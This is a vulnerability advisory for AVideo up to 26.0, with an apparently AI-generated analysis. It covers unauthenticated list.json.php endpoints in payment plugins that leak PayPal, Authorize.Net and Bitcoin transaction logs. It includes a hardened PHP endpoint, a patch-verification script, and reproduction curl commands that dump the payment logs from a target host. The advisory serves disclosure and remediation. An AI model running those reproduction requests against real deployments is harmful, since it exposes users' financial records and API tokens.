AVideo - Unauthenticated Access to Payment Log DataTables Endpoints via list.json.php
Description
AVideo through version 26.0 contains multiple unauthenticated list.json.php endpoints in payment plugins lacking authorization checks, exposing PayPal tokens, Authorize.Net webhooks, and Bitcoin transaction records. Unauthenticated attackers can retrieve all payment transaction data including agreement IDs, user financial records, and API responses via direct GET requests to vulnerable endpoints.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
Patches
Vulnerability mechanics
Root cause
"Missing authorization check in list.json.php endpoints allows unauthenticated access to payment transaction data."
Attack vector
An unauthenticated attacker sends a direct GET request to any of the unprotected `list.json.php` endpoints, such as `/plugin/PayPalYPT/View/PayPalYPT_log/list.json.php`. The `configuration.php` bootstrap does not enforce authentication, and no `.htaccess` rules protect the plugin View directories [ref_id=1]. The endpoint calls `PayPalYPT_log::getAll()`, which executes `SELECT * FROM PayPalYPT_log` and returns all records as JSON. No authentication, session, or user interaction is required.
Affected code
The vulnerable endpoints are `plugin/PayPalYPT/View/PayPalYPT_log/list.json.php`, `plugin/AuthorizeNet/View/Anet_webhook_log/list.json.php`, and `plugin/BTCPayments/View/Btc_payments/list.json.php`. These files lack the `User::isAdmin()` check that is present in their sibling `add.json.php` endpoints. The advisory lists 21 total `list.json.php` endpoints across the codebase that share this missing authorization flaw [ref_id=1].
What the fix does
The recommended fix adds a `User::isAdmin()` guard at the top of each vulnerable `list.json.php` file, immediately after the `require_once` and `header()` lines [ref_id=1]. If the user is not an admin, the script returns a JSON error object and exits. This mirrors the pattern already used in the sibling `add.json.php` endpoints and in the previously patched Scheduler plugin (commit 83390ab). The advisory states that no patch has been released for these 21 endpoints.
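The guard pattern described above, written out as an added example of what a hardened `list.json.php` looks like (this is illustrative code, not AVideo's own source). It assumes the `configuration.php` bootstrap defines `User::isAdmin()` and that the model class exposes the `PayPalYPT_log::getAll()` method the advisory names; the relative `require_once` path and the `{"data": [...]}` DataTables response shape are assumptions. The vulnerable file is the same script without the `if (!User::isAdmin())` block, which is exactly what lets an anonymous GET fall straight through to `getAll()`.

```php
<?php
// Hardened plugin/PayPalYPT/View/PayPalYPT_log/list.json.php (added example,
// not AVideo's code). Assumes configuration.php provides User::isAdmin() and
// the PayPalYPT_log model; the require path below is an assumption.
require_once dirname(__FILE__) . '/../../../../videos/configuration.php';
header('Content-Type: application/json');

// The authorization check the vulnerable endpoints lack. It mirrors the
// sibling add.json.php and the patched Scheduler plugin: refuse anyone who
// is not an authenticated admin before touching payment data.
if (!User::isAdmin()) {
    $obj = new stdClass();
    $obj->error = true;
    $obj->msg = "You can't do this";
    echo json_encode($obj);
    exit; // nothing below runs for unauthenticated or non-admin callers
}

// Only reached by admins: return the log rows for the DataTables view.
// (Assumed response shape; DataTables conventionally reads a "data" key.)
$rows = PayPalYPT_log::getAll();
echo json_encode(['data' => $rows]);
```

The same block, with the model class swapped, applies to the Authorize.Net and BTCPayments endpoints. Placing the guard before any database call (rather than filtering rows afterwards) matters: the exposure here is the `SELECT * FROM PayPalYPT_log` itself, so the query must never execute for an unauthorized request.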
Preconditions
- config: The target must be running AVideo through version 26.0 with the payment plugins installed and accessible via HTTP.
- auth: No authentication or session is required; the attacker can be completely unauthenticated.
- network: The attacker must be able to send HTTP GET requests to the vulnerable endpoints over the network.
- input: The attacker sends a simple GET request with no special payload or parameters.
Reproduction
Step 1 — Dump PayPal transaction logs (unauthenticated):
```
curl -s 'https://target.com/plugin/PayPalYPT/View/PayPalYPT_log/list.json.php'
```
Returns all PayPal transaction records including agreement IDs, tokens, payment amounts, user IDs, and full PayPal API JSON responses.

Step 2 — Dump Authorize.Net webhook logs (unauthenticated):
```
curl -s 'https://target.com/plugin/AuthorizeNet/View/Anet_webhook_log/list.json.php'
```
Returns all Authorize.Net webhook payloads including transaction IDs, event types, and payment details.

Step 3 — Dump Bitcoin payment records (unauthenticated):
```
curl -s 'https://target.com/plugin/BTCPayments/View/Btc_payments/list.json.php'
```
Returns all Bitcoin transaction identifiers, BTC amounts, and store identifiers.

Step 4 — Confirm sibling endpoints ARE protected:
```
curl -s -X POST 'https://target.com/plugin/PayPalYPT/View/PayPalYPT_log/add.json.php'
# Returns: {"error":true,"msg":"You can't do this"}
```
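For an operator who has added the `User::isAdmin()` guard to their own deployment, the four steps above reduce to one question per endpoint: does an unauthenticated GET now come back as the `{"error":true,"msg":"You can't do this"}` refusal, or still as a row set? The following PHP CLI script is an added example (not AVideo tooling) that asks exactly that for the three endpoints named in this advisory; the hostname is passed on the command line, the `data` key is an assumed DataTables response shape, and a refusal is recognised by the `error`/`msg` object the page shows for `add.json.php`.

```php
<?php
// Post-patch verification for the three list.json.php endpoints named above.
// Added example, not part of AVideo. Run against your own instance:
//   php check_list_endpoints.php https://your-avideo.example
$base = rtrim($argv[1] ?? '', '/');
if ($base === '') {
    fwrite(STDERR, "usage: php check_list_endpoints.php <base-url>\n");
    exit(2);
}

// Endpoints listed in the advisory text; the other 18 are not named here.
$endpoints = [
    '/plugin/PayPalYPT/View/PayPalYPT_log/list.json.php',
    '/plugin/AuthorizeNet/View/Anet_webhook_log/list.json.php',
    '/plugin/BTCPayments/View/Btc_payments/list.json.php',
];

/**
 * Classify a response body.
 *   'guarded' : the {"error":true,"msg":...} refusal the fixed endpoints emit
 *   'exposed' : a row set (a JSON list, or an object with a "data" key)
 *   'unknown' : anything else (HTML error page, empty body, ...)
 */
function classify(string $body): string
{
    $json = json_decode($body, true);
    if (!is_array($json)) {
        return 'unknown';
    }
    if (!empty($json['error']) && isset($json['msg'])) {
        return 'guarded';
    }
    $isList = array_keys($json) === range(0, count($json) - 1);
    if (isset($json['data']) || ($isList && count($json) > 0)) {
        return 'exposed';
    }
    return 'unknown';
}

// Plain unauthenticated GET, no cookies, non-2xx bodies still returned.
$ctx = stream_context_create([
    'http' => ['method' => 'GET', 'ignore_errors' => true, 'timeout' => 10],
]);

$exposed = 0;
foreach ($endpoints as $path) {
    $body = @file_get_contents($base . $path, false, $ctx);
    $status = $body === false ? 'no response' : ($http_response_header[0] ?? '?');
    $verdict = $body === false ? 'unreachable' : classify($body);
    if ($verdict === 'exposed') {
        $exposed++;
    }
    printf("%-62s %-22s %s\n", $path, $status, $verdict);
}

// Non-zero exit if any endpoint still hands out payment rows anonymously,
// so the script can sit in a deployment pipeline as a regression check.
exit($exposed > 0 ? 1 : 0);
```

A `guarded` verdict for all three lines is the expected state after the fix; `unknown` usually means the web server returned an HTML error or redirect rather than JSON and is worth inspecting by hand rather than treating as safe.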
Generated on Jun 21, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
- github.com/WWBN/AVideo/security/advisories/GHSA-wprj-9cvc-5w37 (mitre, vendor-advisory)
- www.vulncheck.com/advisories/avideo-unauthenticated-access-to-payment-log-datatables-endpoints-via-list-json-php (mitre, third-party-advisory)
News mentions
No linked articles in our index yet.